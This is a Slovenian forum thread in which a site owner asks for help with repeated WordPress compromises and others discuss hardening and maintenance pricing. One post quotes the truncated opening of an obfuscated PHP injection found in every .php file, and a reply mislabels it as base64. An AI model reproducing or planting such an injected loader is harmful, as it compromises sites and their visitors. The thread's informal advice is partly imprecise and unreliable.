vprašanja debate oglasi
spletni posel
spletni posel paypal crm facebook dhl affiliate programi instagram
več ...
spletne strani
spletne strani cms html pdf wordpress less sass
več ...
splošne debate
splošne debate računalniki
programiranje
programiranje jquery php python postgresql ms sql mysql
več ...
spletni strežniki
spletni strežniki robots.txt domene dns spam .htaccess mod_rewrite
več ...
Značke Menu
spletni posel spletne strani splošne debate programiranje spletni strežniki
Išči
Nova tema
Vprašanje Debata Oglas
Prijava Registracija

Nenehni vdori na Wordpress strani

17 naročnikov

Pozdravljeni.

Imam veliko težav z vdori na Wordpress strani, ki gostujejo tukaj v Sloveniji. Po najboljših močeh skrbim za varnost, a očitno nekaj ne štima:

  • na računalniku imam Avast in Superantispyware in ju redno uporabljam,
  • takoj po vsaki inštalaciji WP najprej naredim novega admin uporabnika (nikoli ne uporabljam "admin") in pobrišem ID # 1,
  • vedno takoj zamenjam salt keys v config.php,
  • za gesla uporabljam cPanel generator nastavljen na 18 znakov, za vsa druga gesla pa generator nastavljen na 30 znakov!
  • na Filezilla nimam shranjenih gesel, res pa je, da uporabljam navadni ftp in ne sftp
  • prvi vtičniki, ki jih inštaliram, so Limit Login Attempts in iThemes Security (pred časom tudi nekajkrat Wordfence ali All in one Security), "navit" skoraj do konca,
  • Wordpress, teme in vsi vtičniki so redno posodabljani.

A, kot rečeno, vse to nič ne pomaga. Pred slabim mesecem sem eno stran, ki je imela težave z vdori, naredil popolnoma na novo - zbrisal sem račun, naredil novega, nova inštalacija WP, vse narejeno od začetka na novo, niti delčka kode nisem uporabil iz stare strani, uporabil sem vse varnostne postopke - in zdaj je stran ponovno okužena.

Vesel bom še kakšnega konkretnega predloga za izboljšanje varnosti. Mislim, da nisem edini s podobnimi težavami.

Lp

5123 1
spletne strani php wordpress

41 odgovorov

Limiti login

Ja dejansko je tole postalo nevzdržno. Sploh si ne moreš več privoščit, da bi nekomu naredil page v enem CMS in ga pustil nedotaknjenega za par mesecev.. V bistvu moraš vsak teden si vzet 15minut časa, da pregledaš page, če je vse OK, če so kakšni novi faili nastal itd..

Konec je časov 1x plačila za postavitev spletnega portala. Mislim, da je potrebno ponujati tudi mesečno vzdrževanje spletnih strani, ne samo zaradi hostinga ampak tudi zaradi varnosti. Že kdo to izvaja in kje se gibljejo cene?

5

d3:
Ja dejansko je tole postalo nevzdržno. Sploh si ne moreš več privoščit, da bi nekomu naredil page v enem CMS in ga pustil nedotaknjenega za par mesecev.. V bistvu moraš vsak teden si vzet 15minut časa, da pregledaš page, če je vse OK, če so kakšni novi faili nastal itd..

Konec je časov 1x plačila za postavitev spletnega portala. Mislim, da je potrebno ponujati tudi mesečno vzdrževanje spletnih strani, ne samo zaradi hostinga ampak tudi zaradi varnosti. Že kdo to izvaja in kje se gibljejo cene?

Kdaj si pa ti začel strani delat, da si šele zdaj to pogruntal? :))
Podpora strankam je no.1 ponudba od nekdaj ;)

2

Ja dobr ni treba bit pametn zdj :))) pac zanima me kolk casa namenite varnosti in kolk dodatno racunate za to

11

Ali lahko kak boljši poznavalec za vse nas, ki to nismo, napiše kaj točno je potrebno storiti in prilepi kodo?

Tody, hvala za link. Takšne konkretne nasvete bi pričakoval tudi od domačih ponudnikov gostovanj in bi vsi imeli precej manj dela in težav. Je to, kar predlaga ta hosting OK? http://www.a2hosting.com/kb/security/application-security/wordpress-security

Preko iThemes Security je bil med drugim narejen deny:

             <files .htaccess>
        Order allow,deny
        Deny from all
    </files>
    <files readme.html>
        Order allow,deny
        Deny from all
    </files>
    <files readme.txt>
        Order allow,deny
        Deny from all
    </files>
    <files install.php>
        Order allow,deny
        Deny from all
    </files>
    <files wp-config.php>
        Order allow,deny
        Deny from all
    </files>

Ali je ta security vtičnik samo za hec? Torej moram še enkrat narediti deny v .htacces in config.php?
iThemes je našponan do konca, razen SSL in še nečesa, Limit Login Attempts je vključen.

Nič ne pomaga, zadnje mesece samo še restoramo :-(

Vsaka .php datoteka ima na začetku vstavljeno morje znakov:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) {$ua=strtolower($_SERVER["\x48\124\x54\1 ............

Kaj pomaga, če to zbrišem? Ali z brisanjem sesujem stran?

Ja to je base64 kodirana koda. Briši.

Najbolje bi bilo sicer gor dat backup verzijo pa updatat vse

d3:
Mislim, da je potrebno ponujati tudi mesečno vzdrževanje spletnih strani, ne samo zaradi hostinga ampak tudi zaradi varnosti. Že kdo to izvaja in kje se gibljejo cene?

Mi to nudimo za 55 EUR + DDV na leto za WP, Joomla in podobno.

5

Redna mesečna tehnična podpora je priporočljiva, izvaja se naj vsaj 1x na 3 mesece. Cena je odvisna od obsega spletne strani - od 25€ - 100€ na mesec. Odvisno od dogovora s stranko kaj podpora zajema. Pogodba se podpiše za čas zakupa domene in ob podaljšanju zakupa praviloma tudi podaljša.

1

suprpp:
Mi to nudimo za 55 EUR + DDV na leto za WP, Joomla in podobno.

Ne stekam - kje se vam izide za to ceno delat karkoli na aplikaciji od stranke? Kaj ta storitev sploh vključuje?

Gusar:
Redna mesečna tehnična podpora je priporočljiva, izvaja se naj vsaj 1x na 3 mesece. Cena je odvisna od obsega spletne strani - od 25€ - 100€ na mesec. Odvisno od dogovora s stranko kaj podpora zajema. Pogodba se podpiše za čas zakupa domene in ob podaljšanju zakupa praviloma tudi podaljša.

To je ze bolj realen cenik ...

1